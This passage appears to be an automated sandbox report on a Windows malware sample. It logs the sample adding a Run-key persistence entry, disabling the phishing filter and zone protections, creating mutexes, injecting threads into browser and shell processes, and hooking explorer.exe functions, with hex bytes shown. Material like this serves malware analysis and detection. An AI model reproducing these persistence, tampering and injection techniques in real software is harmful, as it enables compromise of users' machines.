HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\Privacy CleanCookies Dword 0 success or wait 1 1485F0A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run {1C9B46F7-F88B-AD7E-FB56-FD56EA1DDE44} String "C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe" success or wait 1 1485F0A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 15807505 Dword -1521036859 success or wait 1 1485F0A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 2feg2i1d String zohWpch3LqGxszKm success or wait 1 1485F0A
+ Key value replaced with new
Key Path Name Type Old Data New Data Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter EnabledV8 Dword 1 0 success or wait 1 1485F0A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 1609 Dword 1 0 success or wait 1 1485F0A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 1406 Dword 1 0 success or wait 1 1485F0A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 1609 Dword 1 0 success or wait 1 1485F0A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 1406 Dword 3 0 success or wait 1 1485F0A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 1609 Dword 1 0 success or wait 1 1485F0A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1406 Dword 3 0 success or wait 1 1485F0A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1609 Dword 1 0 success or wait 1 1485F0A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 1406 Dword 3 0 success or wait 1 1485F0A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 1609 Dword 1 0 success or wait 1 1485F0A
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Enabled object name not found 1 1485EB7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters EnabledV8 success or wait 1 1485EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\Privacy 1406 success or wait 1 1485EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\Privacy 1609 success or wait 1 1485EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 1406 success or wait 1 1485EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 1609 success or wait 1 1485EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 1406 success or wait 1 1485EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 1609 success or wait 1 1485EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 1406 success or wait 1 1485EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1609 success or wait 1 1485EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1406 success or wait 1 1485EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 1609 success or wait 1 1485EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 19j6cd23 success or wait 1 1485F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 19j6cd23 success or wait 1 1485F7A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 18457c7d object name not found 1 1485F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 19j6cd23 success or wait 1 1485F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 19j6cd23 success or wait 1 1485F7A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 18457c7d object name not found 1 1485F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 15807505 object name not found 1 1485F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 2af72gde object name not found 1 1485F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 2f6gb30c object name not found 1 1485F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run 2feg2i1d object name not found 1 1485F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run 186gef90 object name not found 1 1485F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run ghhe0d4 object name not found 1 1485F47
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Global\{41836DC6-D3BA-F066-FB56-FD56EA1DDE44} success or wait 1 149A811
\BaseNamedObjects\Global\{97855BF5-E589-2660-FB56-FD56EA1DDE44} success or wait 1 149A811
\BaseNamedObjects\Global\{9B698CC0-32BC-2A8C-FB56-FD56EA1DDE44} success or wait 1 149A811
\BaseNamedObjects\Global\{9B698CC7-32BB-2A8C-FB56-FD56EA1DDE44} success or wait 1 149A811
\BaseNamedObjects\Global\{642AE024-5E58-D5CF-FB56-FD56EA1DDE44} success or wait 2 149A811
\BaseNamedObjects\Local\{FA8F3AD4-84A8-4B6A-FB56-FD56EA1DDE44} success or wait 1 149A811
\BaseNamedObjects\Local\{FA8F3AD5-84A9-4B6A-FB56-FD56EA1DDE44} success or wait 1 149A811
\BaseNamedObjects\Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44} success or wait 1 14A0DFC
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-215D-B06D3016937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-6D5C-B06D7C17937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-055F-B06D1414937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-455F-B06D5414937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-8D5F-B06D9C14937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-915F-B06D8014937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-595E-B06D4815937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-F15E-B06DE015937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-0959-B06D1812937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-4D59-B06D5C12937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D159-B06DC012937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5B-B06DBC10937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-DD5D-B06DCC16937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5C-B06DBC17937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D95B-B06DC810937F} object name exists 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-615A-B06D7011937F} object name exists 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-7D5A-B06D6C11937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-555B-B06D4410937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-955B-B06D8410937F} success or wait 1 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-E15B-B06DF010937F} object name exists 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-615F-B06D7014937F} success or wait 1 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-CD5C-B06DDC17937F} success or wait 1 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-4D55-B06D5C1E937F} success or wait 1 149A78C
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
536 1520 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1498106
168 1520 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1498106
1920 1520 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1498106
1448 1520 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1498106
1100 1520 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1498106
1716 1520 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1498106
508 1520 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1498106
1956 1712 7C8106F9 true C:\Program Files\Internet Explorer\iexplore.exe success or wait 1 1498106
2552 580 7C8106F9 true C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe success or wait 1 1498106
2676 2152 7C8106F9 true C:\WINDOWS\system32\cmd.exe success or wait 1 1498106
2716 1520 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1498106
2808 1520 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1498106
+ Thread delayed
TID Delay Completion Count Source Address
1334 15s success or wait 1 1496E3D
Memory Activities:
+ Memory read
PID Filepath Base Length Value Completion Count Source Address
1520 C:\WINDOWS\explorer.exe 7C90D1AE 30 B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 7C91632D 30 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 77212EBC 30 8B FF 55 8B EC 83 EC 14 53 33 DB 56 33 F6 33 C0 39 5D 08 57 89 5D F8 89 5D EC 89 5D FC 75 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 771C60A1 30 8B FF 55 8B EC 6A 13 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 36 C6 FF FF 5D success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 771CE9C1 30 8B FF 55 8B EC 83 EC 14 53 56 33 C0 57 33 D2 33 DB 33 FF 33 C9 39 55 08 89 45 F8 89 45 EC success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 77212FC1 30 8B FF 55 8B EC 53 56 57 33 DB 33 C0 33 C9 33 D2 33 FF 39 5D 10 75 39 8B 75 0C 85 F6 74 21 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 771C4D8C 30 8B FF 55 8B EC 51 51 53 56 33 DB 33 F6 F6 05 94 BD 23 77 01 89 5D FC 0F 84 BA 7E 00 00 39 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 771C82EA 30 8B FF 55 8B EC 83 EC 24 53 33 DB 39 1D 8C B8 23 77 57 89 5D F4 89 5D F8 89 5D F0 C7 45 E8 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 771F9100 30 8B FF 55 8B EC 83 EC 20 53 56 33 C0 57 33 FF 40 39 3D 8C B8 23 77 89 7D FC 89 7D F8 89 45 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 771D89F7 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D 8C B8 23 77 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 771C79C2 30 6A 2C 68 10 7B 1C 77 E8 A7 9C FE FF 33 DB 89 5D DC 89 5D E4 39 1D 8C B8 23 77 0F 84 E8 95 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 771F9C53 30 8B FF 55 8B EC 6A 01 FF 75 0C FF 75 08 E8 1A F4 FD FF 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 771D9064 30 8B FF 55 8B EC 6A 00 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 771BB1D8 30 8B FF 55 8B EC 83 EC 48 53 8B 5D 10 56 33 F6 39 75 14 57 8B 7D 0C C7 45 F4 01 00 00 00 89 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 71AB3E2B 30 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 71AB4C27 30 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 71AB68FA 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 71AB676F 30 8B FF 55 8B EC 83 EC 10 53 33 DB 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 5E 4A 00 00 8D 45 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 71AB4CB5 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 80 65 00 00 8D 45 F8 50 E8 DD success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 7E41ECA3 30 B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 7E41FE6E 30 B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 7E428D20 30 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 7E42C17E 30 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 7E423D3A 30 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 7E43E577 30 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 7E430833 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 7E44F965 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 7E430A47 30 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 7E44F9B4 30 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 7E42A01E 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 1 149F078
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
1520 C:\WINDOWS\explorer.exe F30000 10 B8 35 00 00 00 E9 A9 D1 9D 7B success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 7C90D1AE 5 E9 A4 AE B8 84 success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F3000A 10 68 6C 02 00 00 E9 1E 63 9E 7B success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 7C91632D 5 E9 09 1F B8 84 success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F30014 10 8B FF 55 8B EC E9 A3 2E 2E 76 success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 77212EBC 5 E9 FD 4B 27 8A success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F3001E 10 8B FF 55 8B EC E9 7E 60 29 76 success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 771C60A1 5 E9 6F 1A 2C 8A success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F30028 10 8B FF 55 8B EC E9 94 E9 29 76 success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 771CE9C1 5 E9 A6 91 2B 8A success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F30032 10 8B FF 55 8B EC E9 8A 2F 2E 76 success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 77212FC1 5 E9 4B 4C 27 8A success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F3003C 10 8B FF 55 8B EC E9 4B 4D 29 76 success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 771C4D8C 5 E9 25 2F 2C 8A success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F30046 10 8B FF 55 8B EC E9 9F 82 29 76 success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 771C82EA 5 E9 0A FA 2B 8A success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F30050 10 8B FF 55 8B EC E9 AB 90 2C 76 success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 771F9100 5 E9 34 EC 28 8A success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F3005A 10 8B FF 55 8B EC E9 98 89 2A 76 success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 771D89F7 5 E9 8B F3 2A 8A success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F30064 12 6A 2C 68 10 7B 1C 77 E9 59 79 29 76 success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 771C79C2 5 E9 F0 03 2C 8A success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F30070 10 8B FF 55 8B EC E9 DE 9B 2C 76 success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 771F9C53 5 E9 B4 E1 28 8A success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F3007A 10 8B FF 55 8B EC E9 E5 8F 2A 76 success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 771D9064 5 E9 BB ED 2A 8A success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F30084 10 8B FF 55 8B EC E9 4F B1 28 76 success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 771BB1D8 5 E9 5F CC 2C 8A success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F3008E 10 8B FF 55 8B EC E9 98 3D B8 70 success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 71AB3E2B 5 E9 3E E9 9D 8F success or wait 1 149F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 8000000 217088 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 1 1493F96
1712 C:\Program Files\Internet Explorer\iexplore.exe 80301F0 4 00 00 00 00 success or wait 1 149A8A9
1712 C:\Program Files\Internet Explorer\iexplore.exe 8030204 4 00 00 00 08 success or wait 1 149A8C9
1712 C:\Program Files\Internet Explorer\iexplore.exe 80306C8 4 B8 03 00 00 success or wait 1 149A0D4
1712 C:\Program Files\Internet Explorer\iexplore.exe 80306CC 4 B8 0A 00 00 success or wait 1 149A0D4
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 2E70000 217088 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 1 1493F96
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 2EA01F0 4 00 00 00 00 success or wait 1 149A8A9
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 2EA0204 4 00 00 E7 02 success or wait 1 149A8C9
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 2EA06C8 4 54 0F 00 00 success or wait 1 149A0D4
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 2EA06CC 4 3C 0F 00 00 success or wait 1 149A0D4
2152 C:\WINDOWS\system32\cmd.exe 150000 217088 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 1 1493F96
2152 C:\WINDOWS\system32\cmd.exe 1801F0 4 00 00 00 00 success or wait 1 149A8A9
2152 C:\WINDOWS\system32\cmd.exe 180204 4 00 00 15 00 success or wait 1 149A8C9
2152 C:\WINDOWS\system32\cmd.exe 1806C8 4 10 00 00 00 success or wait 1 149A0D4
2152 C:\WINDOWS\system32\cmd.exe 1806CC 4 24 00 00 00 success or wait 1 149A0D4
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
1520 C:\WINDOWS\explorer.exe 26D0000 29FF8C8 page read and write success or wait 1 149A5EB
1520 C:\WINDOWS\explorer.exe 26D0000 29FF8CC page read and write success or wait 1 149A5EB
1520 C:\WINDOWS\explorer.exe F30000 29FF4C0 page execute and read and write success or wait 1 14A3FCB
1520 C:\WINDOWS\explorer.exe F40000 2AFE848 page read and write success or wait 44 1491C3E
1712 C:\Program Files\Internet Explorer\iexplore.exe 8000000 2A7FCC8 page execute and read and write success or wait 1 1493F5F
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 2E70000 2A7FCC8 page execute and read and write success or wait 1 1493F5F
488 C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe 0 2A7FCC8 page execute and read and write process is terminating 1 1493F5F
2152 C:\WINDOWS\system32\cmd.exe 150000 2A7FCC8 page execute and read and write success or wait 1 1493F5F
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
1520 C:\WINDOWS\explorer.exe 7C90D1AE 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 7C90D1AE 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 7C91632D 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 7C91632D 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 77212EBC 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 77212EBC 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 771C60A1 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 771C60A1 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 771CE9C1 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 771CE9C1 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 77212FC1 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 77212FC1 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 771C4D8C 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 771C4D8C 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 771C82EA 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 771C82EA 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 771F9100 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 771F9100 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 771D89F7 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 771D89F7 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 771C79C2 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 771C79C2 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 771F9C53 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 771F9C53 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 771D9064 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 771D9064 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 771BB1D8 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 771BB1D8 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 71AB3E2B 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 71AB3E2B 1000 page execute read page execute and read and write success or wait 1 149F134
System Activities:
+ System information queried
System info class Completion Count Source Address
ProcessInformation success or wait 15 14A8879
User Activities:
